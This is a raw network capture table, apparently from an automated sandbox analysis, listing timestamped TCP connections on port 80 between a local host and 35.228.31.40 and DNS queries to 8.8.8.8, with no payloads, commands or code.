Feb 12, 2021 18:45:16.171857119 CET	49752	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:16.171869993 CET	80	49752	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:16.171888113 CET	49752	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:16.171907902 CET	80	49752	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:16.171936035 CET	49752	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:16.171946049 CET	80	49752	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:16.171962023 CET	49752	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:16.171983957 CET	80	49752	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:16.172017097 CET	49752	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:16.172022104 CET	80	49752	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:16.172039032 CET	49752	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:16.172060966 CET	80	49752	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:16.172084093 CET	49752	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:16.172099113 CET	80	49752	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:16.172122002 CET	49752	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:16.172154903 CET	49752	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:16.172349930 CET	80	49752	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:16.172435999 CET	49752	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:16.172652006 CET	80	49752	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:16.172730923 CET	49752	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:16.174834013 CET	80	49752	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:16.174904108 CET	49752	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:16.184487104 CET	80	49752	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:16.184607029 CET	49752	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:16.210170984 CET	80	49752	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:16.210201979 CET	80	49752	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:16.210227966 CET	80	49752	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:16.210253954 CET	80	49752	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:16.210275888 CET	49752	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:16.210287094 CET	80	49752	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:16.210315943 CET	80	49752	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:16.210325956 CET	49752	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:16.210349083 CET	49752	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:16.210382938 CET	49752	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:16.214390039 CET	80	49752	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:16.214426041 CET	80	49752	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:16.214459896 CET	80	49752	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:16.214481115 CET	49752	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:16.214514971 CET	80	49752	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:16.214521885 CET	49752	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:16.214548111 CET	80	49752	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:16.214562893 CET	49752	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:16.214590073 CET	80	49752	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:16.214607954 CET	49752	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:16.214622974 CET	80	49752	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:16.214632988 CET	49752	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:16.214668036 CET	80	49752	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:16.214674950 CET	49752	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:16.214708090 CET	80	49752	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:16.214718103 CET	49752	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:16.214740992 CET	80	49752	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:16.214751005 CET	49752	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:16.214786053 CET	49752	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:16.214808941 CET	80	49752	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:16.214848042 CET	80	49752	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:16.214850903 CET	49752	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:16.214880943 CET	80	49752	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:16.214894056 CET	49752	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:16.214915991 CET	80	49752	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:16.214926958 CET	49752	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:16.214948893 CET	80	49752	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:16.214961052 CET	49752	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:16.214996099 CET	49752	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:16.231929064 CET	49752	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:16.308501005 CET	80	49752	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:16.317478895 CET	49751	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:16.405004025 CET	80	49751	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:16.405142069 CET	49751	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:16.405432940 CET	49751	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:16.484517097 CET	80	49751	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:18.370196104 CET	49754	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:18.370220900 CET	49753	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:18.446321011 CET	80	49754	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:18.446480989 CET	49754	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:18.448458910 CET	49754	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:18.449428082 CET	80	49753	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:18.449593067 CET	49753	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:18.563508987 CET	80	49754	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:18.800822020 CET	80	49754	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:18.800867081 CET	80	49754	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:18.800987959 CET	49754	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:18.817504883 CET	49754	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:18.893484116 CET	80	49754	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:18.997217894 CET	49729	80	192.168.2.3	139.162.191.228
Feb 12, 2021 18:45:19.742693901 CET	49753	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:30.154808998 CET	49755	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:30.229334116 CET	80	49755	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:30.229516983 CET	49755	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:30.231029034 CET	49755	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:30.317939997 CET	80	49755	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:30.318002939 CET	80	49755	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:30.318042040 CET	80	49755	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:30.318085909 CET	49755	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:30.318094969 CET	80	49755	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:30.318136930 CET	80	49755	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:30.318173885 CET	80	49755	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:30.318185091 CET	49755	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:30.318214893 CET	80	49755	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:30.318244934 CET	49755	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:30.318254948 CET	80	49755	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:30.318304062 CET	80	49755	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:30.318311930 CET	49755	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:30.318348885 CET	80	49755	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:30.318404913 CET	49755	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:30.392940044 CET	80	49755	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:30.392981052 CET	80	49755	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:30.393013000 CET	80	49755	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:30.393040895 CET	80	49755	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:30.393039942 CET	49755	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:30.393060923 CET	80	49755	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:30.393085003 CET	80	49755	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:30.393107891 CET	80	49755	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:30.393109083 CET	49755	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:30.393132925 CET	49755	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:30.393134117 CET	80	49755	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:30.393157959 CET	80	49755	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:30.393182993 CET	80	49755	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:30.393197060 CET	49755	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:30.393207073 CET	80	49755	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:30.393234015 CET	80	49755	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:30.393237114 CET	49755	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:30.393260002 CET	80	49755	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:30.393299103 CET	80	49755	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:30.393313885 CET	80	49755	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:30.393318892 CET	80	49755	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:30.393330097 CET	49755	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:30.393332005 CET	80	49755	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:30.393353939 CET	80	49755	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:30.393356085 CET	49755	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:30.393378019 CET	80	49755	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:30.393378973 CET	49755	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:30.393412113 CET	49755	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:30.393419981 CET	80	49755	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:30.393466949 CET	49755	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:30.469984055 CET	80	49755	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:30.470057011 CET	80	49755	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:30.470113993 CET	80	49755	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:30.470143080 CET	49755	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:30.470172882 CET	80	49755	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:30.470232010 CET	80	49755	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:30.470238924 CET	49755	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:30.470285892 CET	80	49755	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:30.470335960 CET	80	49755	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:30.470354080 CET	49755	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:30.470388889 CET	80	49755	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:30.470442057 CET	80	49755	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:30.470444918 CET	49755	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:30.470490932 CET	80	49755	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:30.470542908 CET	80	49755	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:30.470566034 CET	49755	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:30.470592976 CET	80	49755	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:30.470654964 CET	80	49755	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:30.470704079 CET	80	49755	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:30.470756054 CET	80	49755	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:30.470808029 CET	80	49755	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:30.470860004 CET	80	49755	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:30.470916033 CET	80	49755	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:30.470969915 CET	80	49755	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:30.471019030 CET	80	49755	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:30.471069098 CET	80	49755	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:30.471118927 CET	80	49755	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:30.471167088 CET	80	49755	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:30.471218109 CET	80	49755	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:30.471261978 CET	80	49755	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:30.471311092 CET	80	49755	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:30.471359015 CET	80	49755	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:30.471414089 CET	80	49755	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:30.471465111 CET	80	49755	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:30.471515894 CET	80	49755	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:30.471570969 CET	80	49755	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:30.471623898 CET	80	49755	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:30.471674919 CET	80	49755	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:30.471725941 CET	80	49755	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:30.471776009 CET	80	49755	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:30.471832037 CET	80	49755	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:30.471884966 CET	80	49755	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:30.471935034 CET	80	49755	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:30.471987009 CET	80	49755	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:30.472019911 CET	49755	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:30.472038984 CET	80	49755	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:30.472086906 CET	49755	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:30.472101927 CET	49755	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:30.546699047 CET	80	49755	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:30.546753883 CET	80	49755	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:30.546804905 CET	80	49755	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:30.546840906 CET	49755	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:30.546849966 CET	80	49755	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:30.546891928 CET	80	49755	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:30.546920061 CET	49755	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:30.546932936 CET	80	49755	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:30.546974897 CET	80	49755	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:30.546983004 CET	49755	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:30.547013044 CET	80	49755	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:30.547054052 CET	80	49755	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:30.547065973 CET	49755	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:30.547094107 CET	80	49755	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:30.547141075 CET	80	49755	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:30.547168016 CET	49755	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:30.547184944 CET	80	49755	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:30.547224045 CET	80	49755	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:30.547238111 CET	49755	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:30.547264099 CET	80	49755	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:30.547303915 CET	80	49755	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:30.547317028 CET	49755	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:30.547342062 CET	80	49755	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:30.547380924 CET	80	49755	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:30.547394991 CET	49755	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:30.547421932 CET	80	49755	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:30.547476053 CET	49755	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:30.547482014 CET	80	49755	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:30.547525883 CET	80	49755	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:30.547563076 CET	80	49755	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:30.547575951 CET	49755	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:30.547611952 CET	80	49755	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:30.547653913 CET	80	49755	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:30.547662020 CET	49755	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:30.547693014 CET	80	49755	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:30.547732115 CET	80	49755	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:30.547745943 CET	49755	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:30.547771931 CET	80	49755	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:30.547811031 CET	80	49755	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:30.547823906 CET	49755	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:30.547851086 CET	80	49755	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:30.547888994 CET	80	49755	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:30.547903061 CET	49755	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:30.547939062 CET	80	49755	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:30.547991991 CET	80	49755	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:30.548010111 CET	49755	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:30.548015118 CET	80	49755	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:30.548057079 CET	80	49755	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:30.548062086 CET	49755	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:30.548096895 CET	80	49755	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:30.548152924 CET	49755	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:30.548259974 CET	49755	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:30.622975111 CET	80	49755	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:41.609128952 CET	49756	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:41.683723927 CET	80	49756	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:41.686743975 CET	49756	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:41.686889887 CET	49756	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:41.803721905 CET	80	49756	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:42.331084967 CET	80	49756	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:42.331362009 CET	49756	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:42.332549095 CET	49756	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:42.409229994 CET	80	49756	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:42.425360918 CET	49757	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:42.500013113 CET	80	49757	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:42.500209093 CET	49757	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:42.509705067 CET	49757	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:42.513000011 CET	49757	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:42.587002993 CET	80	49757	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:42.590019941 CET	80	49757	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:43.089463949 CET	80	49757	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:43.089664936 CET	49757	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:43.089859962 CET	49757	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:43.164436102 CET	80	49757	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:53.184848070 CET	49764	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:53.262326002 CET	80	49764	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:53.262538910 CET	49764	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:53.262633085 CET	49764	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:53.262676954 CET	49764	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:53.341856956 CET	80	49764	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:53.342135906 CET	80	49764	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:53.606561899 CET	80	49764	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:53.607727051 CET	49764	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:53.607784033 CET	49764	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:53.685175896 CET	80	49764	35.228.31.40	192.168.2.3

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Feb 12, 2021 18:42:59.034492970 CET	63492	53	192.168.2.3	8.8.8.8
Feb 12, 2021 18:42:59.083290100 CET	53	63492	8.8.8.8	192.168.2.3
Feb 12, 2021 18:42:59.985471010 CET	60831	53	192.168.2.3	8.8.8.8
Feb 12, 2021 18:43:00.034506083 CET	53	60831	8.8.8.8	192.168.2.3
Feb 12, 2021 18:43:00.926125050 CET	60100	53	192.168.2.3	8.8.8.8
Feb 12, 2021 18:43:00.974931955 CET	53	60100	8.8.8.8	192.168.2.3
Feb 12, 2021 18:43:01.753401995 CET	53195	53	192.168.2.3	8.8.8.8
Feb 12, 2021 18:43:01.802133083 CET	53	53195	8.8.8.8	192.168.2.3
Feb 12, 2021 18:43:02.704066038 CET	50141	53	192.168.2.3	8.8.8.8
Feb 12, 2021 18:43:02.752909899 CET	53	50141	8.8.8.8	192.168.2.3
Feb 12, 2021 18:43:03.721623898 CET	53023	53	192.168.2.3	8.8.8.8
Feb 12, 2021 18:43:03.770626068 CET	53	53023	8.8.8.8	192.168.2.3
Feb 12, 2021 18:43:07.673043966 CET	49563	53	192.168.2.3	8.8.8.8
Feb 12, 2021 18:43:07.726603031 CET	53	49563	8.8.8.8	192.168.2.3
Feb 12, 2021 18:43:09.089291096 CET	51352	53	192.168.2.3	8.8.8.8
Feb 12, 2021 18:43:09.141280890 CET	53	51352	8.8.8.8	192.168.2.3
Feb 12, 2021 18:43:10.073920965 CET	59349	53	192.168.2.3	8.8.8.8
Feb 12, 2021 18:43:10.146667957 CET	53	59349	8.8.8.8	192.168.2.3
Feb 12, 2021 18:43:10.608534098 CET	57084	53	192.168.2.3	8.8.8.8
Feb 12, 2021 18:43:10.688538074 CET	53	57084	8.8.8.8	192.168.2.3
Feb 12, 2021 18:43:11.613104105 CET	57084	53	192.168.2.3	8.8.8.8
Feb 12, 2021 18:43:11.671729088 CET	53	57084	8.8.8.8	192.168.2.3
Feb 12, 2021 18:43:12.627651930 CET	57084	53	192.168.2.3	8.8.8.8
Feb 12, 2021 18:43:12.685919046 CET	53	57084	8.8.8.8	192.168.2.3
Feb 12, 2021 18:43:13.430605888 CET	58823	53	192.168.2.3	8.8.8.8
Feb 12, 2021 18:43:13.488349915 CET	53	58823	8.8.8.8	192.168.2.3
Feb 12, 2021 18:43:14.251566887 CET	57568	53	192.168.2.3	8.8.8.8
Feb 12, 2021 18:43:14.308723927 CET	53	57568	8.8.8.8	192.168.2.3
Feb 12, 2021 18:43:14.643381119 CET	57084	53	192.168.2.3	8.8.8.8
Feb 12, 2021 18:43:14.700423956 CET	53	57084	8.8.8.8	192.168.2.3
Feb 12, 2021 18:43:15.376492023 CET	50540	53	192.168.2.3	8.8.8.8
Feb 12, 2021 18:43:15.425154924 CET	53	50540	8.8.8.8	192.168.2.3
Feb 12, 2021 18:43:16.331537962 CET	54366	53	192.168.2.3	8.8.8.8
Feb 12, 2021 18:43:16.381520033 CET	53	54366	8.8.8.8	192.168.2.3
Feb 12, 2021 18:43:16.447017908 CET	53034	53	192.168.2.3	8.8.8.8
Feb 12, 2021 18:43:16.631083012 CET	53	53034	8.8.8.8	192.168.2.3
Feb 12, 2021 18:43:17.195960045 CET	57762	53	192.168.2.3	8.8.8.8
Feb 12, 2021 18:43:17.252377987 CET	53	57762	8.8.8.8	192.168.2.3
Feb 12, 2021 18:43:18.659318924 CET	57084	53	192.168.2.3	8.8.8.8
Feb 12, 2021 18:43:18.707916975 CET	53	57084	8.8.8.8	192.168.2.3
Feb 12, 2021 18:43:31.202761889 CET	55435	53	192.168.2.3	8.8.8.8
Feb 12, 2021 18:43:31.269519091 CET	53	55435	8.8.8.8	192.168.2.3
Feb 12, 2021 18:43:48.419603109 CET	50713	53	192.168.2.3	8.8.8.8
Feb 12, 2021 18:43:48.473040104 CET	53	50713	8.8.8.8	192.168.2.3
Feb 12, 2021 18:43:49.651252985 CET	56132	53	192.168.2.3	8.8.8.8
Feb 12, 2021 18:43:49.713720083 CET	53	56132	8.8.8.8	192.168.2.3
Feb 12, 2021 18:43:52.310045004 CET	58987	53	192.168.2.3	8.8.8.8
Feb 12, 2021 18:43:52.361627102 CET	53	58987	8.8.8.8	192.168.2.3
Feb 12, 2021 18:44:03.318223953 CET	56579	53	192.168.2.3	8.8.8.8
Feb 12, 2021 18:44:03.381067991 CET	53	56579	8.8.8.8	192.168.2.3
Feb 12, 2021 18:44:14.250917912 CET	60633	53	192.168.2.3	8.8.8.8
Feb 12, 2021 18:44:14.324805021 CET	53	60633	8.8.8.8	192.168.2.3
Feb 12, 2021 18:44:30.095710993 CET	61292	53	192.168.2.3	8.8.8.8
Feb 12, 2021 18:44:30.145888090 CET	53	61292	8.8.8.8	192.168.2.3
Feb 12, 2021 18:44:54.922874928 CET	63619	53	192.168.2.3	8.8.8.8
Feb 12, 2021 18:44:54.971620083 CET	53	63619	8.8.8.8	192.168.2.3
Feb 12, 2021 18:44:55.384993076 CET	64938	53	192.168.2.3	8.8.8.8
Feb 12, 2021 18:44:55.445045948 CET	53	64938	8.8.8.8	192.168.2.3
Feb 12, 2021 18:45:08.934063911 CET	61946	53	192.168.2.3	8.8.8.8
Feb 12, 2021 18:45:08.995332003 CET	53	61946	8.8.8.8	192.168.2.3
Feb 12, 2021 18:45:11.739392042 CET	64910	53	192.168.2.3	8.8.8.8
Feb 12, 2021 18:45:12.245188951 CET	53	64910	8.8.8.8	192.168.2.3
Feb 12, 2021 18:45:14.948137999 CET	52123	53	192.168.2.3	8.8.8.8
Feb 12, 2021 18:45:15.268256903 CET	53	52123	8.8.8.8	192.168.2.3
Feb 12, 2021 18:45:18.021754026 CET	56130	53	192.168.2.3	8.8.8.8
Feb 12, 2021 18:45:18.349622011 CET	53	56130	8.8.8.8	192.168.2.3
Feb 12, 2021 18:45:29.777065992 CET	56338	53	192.168.2.3	8.8.8.8
Feb 12, 2021 18:45:30.107180119 CET	53	56338	8.8.8.8	192.168.2.3
Feb 12, 2021 18:45:38.950546980 CET	59420	53	192.168.2.3	8.8.8.8
Feb 12, 2021 18:45:39.319521904 CET	58784	53	192.168.2.3	8.8.8.8
Feb 12, 2021 18:45:39.321717024 CET	63978	53	192.168.2.3	8.8.8.8
Feb 12, 2021 18:45:39.937611103 CET	59420	53	192.168.2.3	8.8.8.8
Feb 12, 2021 18:45:40.313288927 CET	58784	53	192.168.2.3	8.8.8.8
Feb 12, 2021 18:45:40.313411951 CET	63978	53	192.168.2.3	8.8.8.8
